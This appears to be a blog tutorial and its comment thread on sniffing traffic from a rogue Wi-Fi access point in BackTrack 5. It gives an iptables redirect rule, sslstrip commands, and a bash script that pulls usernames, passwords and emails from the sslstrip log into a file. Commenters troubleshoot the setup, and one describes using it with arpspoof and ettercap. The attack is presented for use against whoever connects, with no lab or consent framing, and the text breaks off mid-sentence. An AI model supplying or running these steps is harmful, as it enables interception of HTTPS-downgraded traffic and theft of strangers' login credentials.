This is a continuation of the previous guide Access Point in BackTrack5, you can find here:
http://teh-geek.com/?p=512
When the access point is setup and working, we wanna be able to sniff the traffic going on.
actually, the only thing we need is a script called sslstrip, written in python and
a part of a custom script I found at comaX’s script “sniffing traffic”.
A link to comaX’s script can be found at the end of this article.
First of, install sslstrip, if you haven’t already..
It’s quite simple:
cd /pentest/web/sslstrip/ python setup.py install |
Then we need to run sslstrip with log enabled. We are going to look through the log-file
for username and passwords..
Iptables for running sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 |
I start sslstrip with the following options:
sslstrip -a -f -k -w /root/sslstrip.log |
The sslstrip.log quickly becomes HUGE and it’s almost impossible to look through it manually.
So – the script a talked about earlier is used to look through the sslstrip.log
#!/bin/bash echo "Do you want to save passwords to a file? (Y=keep)" echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)" read -e keeppd if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then cat /root/sslstrip.log | awk -F "&" '!/GET/ && !/if/ !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' | awk -F "&" '{for(i=1;i<=NF;i++) print $i }' | egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user=|username=|login=|credential=|_user|_pwd=|email_address=" | awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt if [ -f "/root/filename.pass.txt" ]; then echo "Passwords saved !" else echo "Error while saving passwords" fi else echo "Password saving skipped." fi rm /root/filename.txt echo -e "\nTemporary files deleted." |
You might want to change some dirs in the script to match it to your sslstrip.log output.
But that’s pretty much it..
copy the script, chmod +x the script and run it..
then you have all the passwords and usernames, from the sslstrip.log without all the extra “information”..
Link to sslstrip: http://www.thoughtcrime.org/software/sslstrip/
Link to comaX’s script: http://www.backtrack-linux.org/forums/backtrack-5-general-topics/40683-script-sniffing-traffic.html
Nice. Now no need to mess with iptables rules.
I’m having a problem though getting sslstrip to remove the SSL. I followed your other tutorial and I got the AP to work.
Using “cd /pentest/web/sslstrip/
python setup.py install” installs sslstrip 0.8 on my backtrack gnome 32bit. so I downloaded the sslstrip 0.9 using the directions on the sslstrip website.
When I run “sslstrip -a -f -k -w /root/sslstrip.log” it starts sslstrip 0.9, but the log stays empty and also all the websites that the user of my AP visit still have HTTPS.
any ideas of what the problem could be?
sorry, that is my fault..
I forgot to include the ip-table needed to run sslstrip proberly.
Actually, I though that it was included in the other guide..
Anywho – I’ve added the iptable in this guide..
Thanks for making me aware of it..
//M00kaw
That work. Thanks. Keep up the “GREAT” work.
Thanks works for me as well. Keep them coming!
Hi !
Your tutorial looks nice, but just for that, he sniff only ssl website log ? Or simple protocol website like http ?
Thx !
The way ssl-strip works, is by keeping http-traffic separate from https. In other words, bridging from port 80 to port 443. This is only for http…
Another tool, for all other protocols is sslsniff – that fakes a certificate. You can look into it at http://thoughtcrime.org/software/sslsniff/
I’m writing a paper on the theory behind ssl-strip and a video is also coming up some time.
After that, i’ll dive into ssl-sniff and write tutorials for that too..
//M00kaw
Dear
i work preaty good with sslstrip and i use the command:
sslstrip -k -l 10000
i receive all information i need with arpspoof and ettercap, but how can i keep the logs with all the information permanently on the comuter or on the usb backtrack, because when i shut down the comuter i do not know where the logs are, can you help?
best regards and thank for youreffort
sslstrip can save a log-file…
-w /path/to/file.log
Should this:
sslstrip -a -f -k -w /root/sslstrip.log
be like this:
sslstrip -a -f -k -l 10000 -w /root/sslstrip.log
Your tutorial seems to be only place where -l is not in use and I’m just wondering why? Did you forgot it or will this really work without it?
-l is the listening port.. and that’s default port 10000.. so writing -l 10000 is just useless, since the program already does that.
You only use -l if you don’t want use port 10000.
I hope that explains it ?
Hey! Nice post…I was just wandering if u could tell me how to go about seeing the traffic log from sslstrip. I treied cat sslstrip.log but doesnt seem to pull up anything. Someone also asked me to check the folder of SSLSTRIP and find a new file sslstrip.log….Any idea on how to do that…I’m running bt5
when launching ssl-strip, make sure to launch it with -w /path/to/dir where you want to save the log-file.
Then parse the log-file for username, password, email etc.
I’ve used a snip of code – you can find it at